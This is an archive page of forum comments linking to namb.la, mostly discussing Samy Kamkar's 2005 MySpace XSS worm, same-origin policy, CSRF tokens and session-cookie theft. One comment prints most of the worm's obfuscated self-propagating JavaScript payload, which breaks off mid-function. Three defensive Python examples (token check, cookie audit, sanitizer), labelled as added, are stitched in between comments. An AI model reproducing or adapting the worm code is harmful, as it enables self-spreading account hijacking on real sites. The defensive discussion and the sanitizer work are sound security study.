Domain: namb.la
Stories and comments across the archive that link to namb.la.
Comments · 35
-
Samy is my hero
a 'security' guy
You know this guy is Samy Kamkar, the hacker who also unleashed the first-ever XSS worm on the world that infected a million MySpace profiles in a matter of hours...
Tomorrow I happen to attend a meeting of OWASP where Samy will speak about the latest XSS exploits, other JavaScript tricks, and other things (like a nice new method of NAT penetration)... I could say the title 'security guy' is earned by him for finding some great hacks and sharing them with the world, and even taking time to talk about it in person to the open source community.
but most of all, Samy is my hero -
Re:Wait, what?
Letting laymen edit HTML always worked out for the best.
Although the Myspace Worm has to be one of the most hilarious things I've ever read.
-
Use a Myspace Worm for more Lulz
I'll start by submitting the e-mail addresses of everyone I dislike and claim to be their parents and say that they are lying about their age. Another well thought out government idea.
A true geek would automate this. Technical explanation of The MySpace Worm. Also called the "Samy worm" or "JS.Spacehero worm" -
Re:Can someone explain this for me...?
No it can't. The same-origin policy prevents javascript from one website from accessing objects returned from another website. Kinda. It's complicated and there are occasionally ways to hack it, but generally speaking when same-origin is working, the token is a pretty secure mechanism.
The best way to break tokens like that is to find some XSS on the site you're attacking -- that allows you to get javascript running within the domain of the remote site. /Then/ you can do what you described above and have your javascript access the token and return it. That's what Samy did with the SamyIsMyHero worm.
http://en.wikipedia.org/wiki/Same_origin_policy
http://namb.la/popular/tech.html -
Re:Restitution?
but there's no motivation for disclosing vulnerabilities.
When you see an insecure physical lock, do you pick it and enter the building? After all there's no motivation for disclosing insecure locks. That's why you start breaking and entering in the first place I suppose?
The guy spent far more time and effort bypassing myspace's protections than you'd spend picking a few locks. -
Re:Restitution?
I think the better allegory here is that somebody leaves all their savings in a pile in the driveway,
Not at all. More like they leave their savings indoors, in their home, and lock the door with several locks. Samy spent considerable time bypassing several different protections of myspace, he spent far more time and ingenuity than you'd need to pick a few locks. It's all documented. If we are to compare with piles of cash, he certainly picked several locks to get at it. With that analogy it's a very clear case of breaking and entering.
-
Re:He wouldn't have been caught...
Judging from his personal website, I'd say that he would know how to stay anonymous if he chose to. He didn't even think that it would cause trouble:
I have hit 1,000,000+ users. In less than 20 hours, I've hit over 1/35th of all myspace users. Every request is from a unique, living, and logged in user. I refresh once more and now see nothing but a message that my profile is down for maintenance. I messed up, didn't I. I'm now more afraid and decide I am never doing anything even near illegal ever again. To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode.
1 hour later, 7:05 pm: A friend tells me that they can't see their profile. Or anyone else's profile. Or any bulletin boards. Or any groups. Or their friends requests. Or their friends. Nothing on myspace works. Messages are everywhere stating that myspace is down for maintenance and that the entire myspace crew is there working on it. I ponder whether I should drive over to their office and apologize. Another attempt to free my mind of worry, I go back to watching some episodes of The OC which I downloaded a few days earlier. File sharing rocks.
2.5 hours later, 9:30 pm: I'm told that everything on myspace seems to be working again. My girlfriend's profile, along with many, many others, still say "samy is my hero", however the actual self-propagating program is gone. I'm relieved that it's back up as they can't claim damages for any downtime past this second if everything is in fact working properly.
10 minutes later, 9:40 pm: I haven't heard from anyone at myspace or FOX. A few minutes later, my girlfriend calls, I pick up, and she says to me, "you're my hero". I don't actually get it until about three hours later.
-
Re:Exactly. He's not exactly blameless.
Isn't a script kiddie someone who launches other peoples' exploits that are discoverable against targets?
I don't like what this guy did, but it was clever and certainly not someone a script kiddie can do. Here's his explanation of his worm and how it worked. Clearly it took a lot of original effort and thought to do it.
D -
Re:Idea
I can tell you that before I saw his account of the situation, I wanted to let anyone do anything they wanted on my fledgling social networking site. I agree, this account is required reading for anyone wanting to create a community site.
What he did and how much time and effort he was willing to put into it shocked the heck out of me and caused me to put very strong anti-JavaScript code into my site. I didn't want to do it because I wish we could have given people the freedom to be creative in that arena. But after I saw what he did I felt I had no choice.
That being said, the reality is that he did an enormous amount of damage. He says things were back to normal at myspace within a few hours, but I remember at the time that the system was highly unstable for a few weeks after the incident was supposedly cleaned up.
From the point of view of the folks who ran myspace, what he did caused untold misery and pain for many people and i think he deserved a heavy punishment.
Not that I really think he will avoid using the Internet for social purposes no matter what the courts say. And I really don't think probation or community service seems like that heavy a punishment for someone who deliberately disrupted a service, however disliked in some quarters, that many people rely on.
Samy and people like him make it a difficult, miserable and thankless task to create services that hopefully will do nice things for people. They make people like me waste our time trying to figure out how to restrict things, when we'd much rather produce fun features people will use and enjoy. Samy's account made me laugh, but it also made me furious that human nature is so pointlessly destructive.
I hope the sentence deters people from doing similar things.
I wonder how much he had to pay Myspace. Does anyone know?
D -
Re:The wording of this article is horribly biased
A proof of concept does something. That's how you get your proof. The thing is that it doesn't do something malicious. In the case of MySpace, that would probably include mangling of a profile or *deleting* your friends list. Anyway, I think that this explains his true intent. From http://namb.la/popular/
7 hours later, 8:35 am: You have 74 friends and 221 friend requests. Woah. I did not expect this much. I'm surprised it even worked.. 200 people have been infected in 8 hours. That means I'll have 600 new friends added every day. Woah.
1 hour later, 9:30 am: You have 74 friends and 480 friend requests. Oh wait, it's exponential, isn't it. Shit. -
Re:No substance
Guess what?
Samy's worm did exactly that.
Relevant extract from his fascinating account, well worth reading in its entirety:
9) Finally we can do a POST! However, when we send the post it never actually adds a friend. Why not? Myspace generates a random hash on a pre-POST page (for example, the "Are you sure you want to add this user as a friend" page). If this hash is not passed along with the POST, the POST is not successful. To get around this, we mimic a browser and send a GET to the page right before adding the user, parse the source for the hash, then perform the POST while passing the hash.
I must say I was quite impressed, not to mention frightened half to death, by what Samy went through to create his worm. It was not a simple task at all. I had thought before that nobody would waste their time doing something like this; I was, of course, wrong.
The consequence of his story is that I changed my own social networking site to become a lot more secure. I didn't like doing it because I would have preferred to let people do what they want, but that article was a real eye opener as to how dangerous that would have been.
D -
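Added example, not code from any of the posts above or from MySpace: a minimal Python model of the per-session token that the "hash" on the pre-POST page served as, covering both the same-origin discussion earlier on this page and the extract quoted in the post above. A forged POST from another origin is rejected because that origin cannot read the confirmation page; a script already running inside the site's origin can, which is why output filtering, not the token, is the defence against injected script. The server secret, session layout and action name are assumptions.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed server secret, constructed for this example; a real deployment
# loads it from configuration and never hard-codes it.
SERVER_SECRET = b"example-server-secret-do-not-reuse"

@dataclass
class Session:
    session_id: str
    user: str
    friends: set = field(default_factory=set)

def csrf_token(session: Session, action: str) -> str:
    """Per-session, per-action token, playing the role of the 'hash' on the
    pre-POST page. A page on another origin cannot read the form that
    carries it, so a forged request cannot supply it."""
    msg = f"{session.session_id}:{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def render_add_friend_form(session: Session, friend_id: str) -> str:
    """The 'Are you sure?' confirmation page with the token as a hidden field."""
    token = csrf_token(session, "addfriend")
    return (f'<form method="POST" action="/addfriend">'
            f'<input type="hidden" name="friendID" value="{friend_id}">'
            f'<input type="hidden" name="hash" value="{token}">'
            f'</form>')

def handle_add_friend(session: Session, form: dict) -> bool:
    """POST handler: accept only when 'hash' matches this session's token."""
    expected = csrf_token(session, "addfriend")
    if not hmac.compare_digest(form.get("hash", ""), expected):
        return False
    session.friends.add(form["friendID"])
    return True

def demo() -> dict:
    alice = Session(session_id=secrets.token_hex(16), user="alice")
    # Cross-site forgery: a POST without the token (the other origin could
    # not read the confirmation page) is rejected.
    forged = handle_add_friend(alice, {"friendID": "1001"})
    # Legitimate flow: the browser loads the confirmation page and submits
    # the token it contains. A script already running in the site's origin
    # can perform exactly these two steps, which is why the token does not
    # help against injected script.
    page = render_add_friend_form(alice, "42")
    token = page.split('name="hash" value="')[1].split('"')[0]
    legit = handle_add_friend(alice, {"friendID": "42", "hash": token})
    # A token taken from one session is useless in another.
    bob = Session(session_id=secrets.token_hex(16), user="bob")
    replayed = handle_add_friend(bob, {"friendID": "42", "hash": token})
    return {"forged": forged, "legit": legit, "replayed": replayed,
            "alice_friends": sorted(alice.friends)}
```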
Re:I don't get XSS
There is a tension between what users want to do that's legitimate, and what users can do maliciously.
For example, I'm developing a myspace-like system, with which I am presently grappling with these issues.
Ideally, I'd like to give users perfect creative freedom to do whatever they want on their profiles and online community pages. After all, they should be able to express themselves, no?
So before these attacks became well-known, it was a perfectly reasonable stance to say that we should NOT filter user input, that we should let people express themselves as they want. That's been my position, before I learned about this problem.
Before you laugh, even computing greats have made similar mistakes. RMS, of Emacs, GNU and GPL fame, used to rail against people using passwords on their accounts. He had no password on his account on the MIT AI ITS machine, which was accessible through the ARPANet. Theoretically, a lot of bad things could have happened to him, but they didn't because yesterday's ARPANet users had respect for him and people like him. The administrators eventually forced him, pretty much at gunpoint, to set a password. Of course he told everyone what it was. Such was the wonderful culture of the AI lab.
I don't know what RMS has done personally, but I'm sure he has a password on his account now, and I'm sure that fact greatly saddens him. I am sad about it myself. I don't like this new world of poison users and XSS and spyware and so on, but unfortunately you have to accept it as a fact of life.
My own tipping point, which showed me how important this issue was, was this fellow. I actually like him, or at least his writing style. But what he did to myspace makes my blood run cold. I realized after that that I simply could not allow people to do whatever they wanted.
Another important thing to note is that preventing XSS is not as simple as it seems. In fact, preventing it may be just plain impossible if we don't want to prevent people from doing things like showing videos and Flash, with the OBJECT tag. There are apparently huge security holes in allowing it, but if you don't, then you have a world without music or video. If anyone has tips on securing this, please reply to this and let us all know. I was thinking that it might be necessary to allow only certain URLs but that seems too draconian if there's any way to avoid it.
If we disregard that particular risk, it's still very difficult to prevent JavaScript from sneaking in. This site, unfortunately Slashdotted together with the article, is an excellent example of how hard it is to deal with these problems, and how subtle and persistent the enemy is.
Anyway, I've spent two solid days figuring out ways to deal with all the exploits Rsnake deals with in the above document. I'm about done now, and I'm confident that my system will stand tall against most known attacks. But there's always something around the corner, and I guess that's what makes being a security guy interesting.
Personally, I really resent the time I have to waste on restricting people's freedoms just because this is a cruel and crazy world out there of people who wish you ill, just because you happen to design systems. I love to design systems, and this new project is the best thing I've ever worked on, but I shake my head over what this world has become.
And then I go back to work.
D -
Re:Isn't that XSS??
would you happen to know of any other types of attack that XSS might enable?
How about the myspace worm?
Cross site scripting is really great for simple session hijacking. PHP stores a cookie called PHPSESSID by default with your unique session identifier. All of the important bits of your session (username, password, whatever else they're storing) are stored on the server. If someone can guess (very difficult) or steal (with xss very easy) that identifier, they can impersonate you and have access to whatever information that entails on the vulnerable website. If it's phpBB, they can elevate privileges to become a moderator/admin. If it's Amazon they can see your credit card number. So yes, it's great for phishers.
Also, an interesting note about xss: it's a shotgun approach. When an attacker exploits an xss vulnerability, they will steal the cookies of everybody who views that page, not just you. -
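Added example, not from the post above: a Python check over constructed Set-Cookie headers that flags a PHPSESSID (or similar session cookie) sent without the HttpOnly, Secure and SameSite attributes. The session cookie names and the sample values are assumptions.

```python
import re

# Constructed sample responses: the first is what a default PHP setup of
# the era sent, the second is the hardened form of the same cookie.
WEAK_HEADERS = [
    "Set-Cookie: PHPSESSID=8d2f5a0c1b3e4f6a7b8c9d0e1f2a3b4c; path=/",
    "Set-Cookie: lang=en; path=/",
]
HARDENED_HEADERS = [
    "Set-Cookie: PHPSESSID=8d2f5a0c1b3e4f6a7b8c9d0e1f2a3b4c; path=/; "
    "HttpOnly; Secure; SameSite=Lax",
    "Set-Cookie: lang=en; path=/",
]

# Assumed list of cookie names that carry a server-side session id.
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sid"}
REQUIRED_FLAGS = ("HttpOnly", "Secure", "SameSite")

def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header into cookie name, value and attributes.
    Attribute names are lower-cased; flags without a value map to ''."""
    body = re.sub(r"^set-cookie:\s*", "", header, flags=re.I)
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}

def audit_session_cookies(headers: list) -> dict:
    """Return {cookie_name: [missing attributes]} for session cookies only;
    other cookies (language, layout preferences) are ignored."""
    findings = {}
    for h in headers:
        c = parse_set_cookie(h)
        if c["name"].lower() not in SESSION_COOKIE_NAMES:
            continue
        missing = [f for f in REQUIRED_FLAGS if f.lower() not in c["attrs"]]
        findings[c["name"]] = missing
    return findings
```

HttpOnly stops a script from reading the cookie; it does not stop requests that a script issues from inside the page, which is the path the worm took with its own GETs and POSTs.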
Re:In the minority again
Well, it's a way to connect with people. If you're satisfied with the people you have, then a social networking site probably looks pretty stupid. You wouldn't surf match.com if you weren't looking for a date, and you wouldn't be on myspace if you weren't looking for people to connect with.
If you are, social networking sites can seem pretty neat since there are a lot of people there, some of who are interesting.
What's really appealing about myspace is that although most people wildly misuse their "space", it is a place where they can be creative and put out things that they like. Those things are not what most programmers think they should like, but the point is that they can be in control and there's plenty of help available to make their profile look as they want it to.
Human beings in general seem to be more interested in whether something looks "cool" than whether you can read it or not. And that's fine, because they are people and they are expressing themselves. And on myspace, it's relatively easy to find them, which is where I think social networking has a huge advantage over standalone blogs.
Someone who put hours and hours into breaking myspace has a pretty interesting perspective on it. Funny, too. I'm Popular.
I'm doing my own site, aimed at more mature people than myspace, but it's not ready yet. To show social networking with an adult flair, I consider my best competition to be Tribe. It used to have adult profiles and ... interesting ... pictures, but sadly their corporate backers decided that wasn't a brainy scheme and removed it. But it's still pretty much social networking for people who have passed the Myspace stage.
D -
Re:Script tags isn't enough.
you may want to check Samy's hack of Myspace
While he didn't use it for anything really detrimental, he more than likely could have, especially when you see the bunch of code he managed to cram in.
-
I'm pretty sure...
...that my AJAX-based Slashdot posting console is secure.
But most of all, samy is my hero.
-
Re:US needs to be more like Europe
Yeah, unless you're on MySpace.
-
And still get pwn3d
Does nobody remember the "Samy is my hero" business that took down MySpace?
Story: http://namb.la/popular/
Technical Explanation: http://namb.la/popular/tech.html
He did all of his GETs and POSTs using XML-HTTP -
Samy is my Hero
This is how you use AJAX to create XMLHttpRequest instances.
The Story: http://namb.la/popular/
The Explanation: http://namb.la/popular/tech.html -
Re:it was funny
samy is my hero! (it's a great story, check out the technical explanation as well
...) -
Rupert is just jealous.
No one has added him to their friends list. Of course he's going to get a bit cranky.
However samy is my hero.
-
Re:All things may be equal.
Most people are on myspace because their friends are all on myspace, and they value that very time-consuming to set up network.
They also know that's where the hot girls and buff guys are.
So it remains popular even though its software engineering is truly abysmal.
D -
XML
If by useful you mean allowing MySpace to get pwn3ed, then yes, AJAX is useful.
Remember the Samy worm?
http://namb.la/popular/tech.html
He used html, java, dhtml, xml...
Especially XML
AJAX seems to be like Darth Vader... Powerful, yet dangerous. -
Re:But most of all...
The parent is, of course, referring to the guy that wrote a worm (using HTML + Javascript) to get a lot of MySpace friends. He's even written down how he did it. Quite an interesting read.
-
How he did it
From the horse's mouth:
http://namb.la/popular/tech.html -
The exploit itself
Taken from http://namb.la/popular/tech.html this is the exploit he used:
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.my space.com'){document.location='http://www.myspace. com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var 
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '</td>');AG=AG.substring(61,AG.length);if(AG.index Of('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if -
Re:This is *not* XSS
And now for the nit-picking minute...
If you read the technical explanation of the worm, you will see (item 8) that he had to add an extra redirection to go from profile.myspace.com to www.myspace.com.
The cross-site part is not the main part of the worm. But still...
-
Re:Here's the Guys Explanation of his code
Here is his explanation
Yeah, right. There's no way you're tricking me into going to some page with a suspicious URL like that! -
Here is the source:
The source and the explanation.
-
samy is my hero
Turns out that he just used the fact that (not trying to start a flame war here) IE and some versions of Safari allow javascript tags within CSS.
Samy's info on the topic (coral)
His explanation of how it works -
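Added example, not from any post here and not from namb.la: a small allowlist sanitizer in Python for the filtering problem raised in the "Re:I don't get XSS" thread above and the javascript-in-CSS trick mentioned in this post. It normalises attribute values before inspecting them, so the split "java\nscript:" token visible in the exploit listing and entity-encoded variants are recognised, accepts only allowlisted style declarations, and drops script elements together with their bodies. The allowlists and the constructed sample are assumptions.

```python
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"div", "p", "span", "b", "i", "u", "a", "img", "br"}
ALLOWED_ATTRS = {"id", "class", "style", "href", "src", "alt", "title"}
ALLOWED_CSS_PROPS = {"color", "background-color", "font-size", "font-family", "text-align"}
CSS_DENY = ("url(", "expression(", "javascript:", "@import", "\\", "behavior:")
SKIP_CONTENT = {"script", "style"}  # drop these elements together with their bodies

def normalize(value: str) -> str:
    """Decode entities, strip whitespace/control chars: 'java\\nscript:' -> 'javascript:'."""
    return re.sub(r"[\s\x00-\x1f\x7f]", "", html.unescape(value)).lower()

def safe_url(value: str) -> bool:
    n = normalize(value)
    if n.startswith(("http://", "https://")):
        return True
    return ":" not in n and not n.startswith("//")  # otherwise relative only

def safe_style(value: str) -> bool:
    """Accept only 'prop: value' declarations for allowlisted properties."""
    n = normalize(value)
    if any(bad in n for bad in CSS_DENY):
        return False
    for decl in filter(None, n.split(";")):
        prop, sep, _ = decl.partition(":")
        if not sep or prop not in ALLOWED_CSS_PROPS:
            return False
    return True

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], None
    def handle_starttag(self, tag, attrs):
        if tag in SKIP_CONTENT:
            self.skipping = tag
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:  # HTMLParser has already decoded the values
            value = value or ""
            if name not in ALLOWED_ATTRS:  # drops on*, expr and the like
                continue
            if name in ("href", "src") and not safe_url(value):
                continue
            if name == "style" and not safe_style(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif not self.skipping and tag in ALLOWED_TAGS - {"img", "br"}:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data))

def sanitize(fragment: str) -> str:
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out)

# Constructed sample modelled on the opening of the worm's injected div.
WORM_LIKE = ('<div id=mycode style="BACKGROUND: url(\'java\nscript:eval(document.all.mycode.expr)\')"'
             ' expr="var x=1">but most of all, samy is my hero</div>')
```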
Here's the Guys Explanation of his code
Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.
And here is his version of the story.
He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.
Also, his site really is "namb.la" -- he's making some sort of joke at NAMBLA's expense, which is pretty suspect, I think. -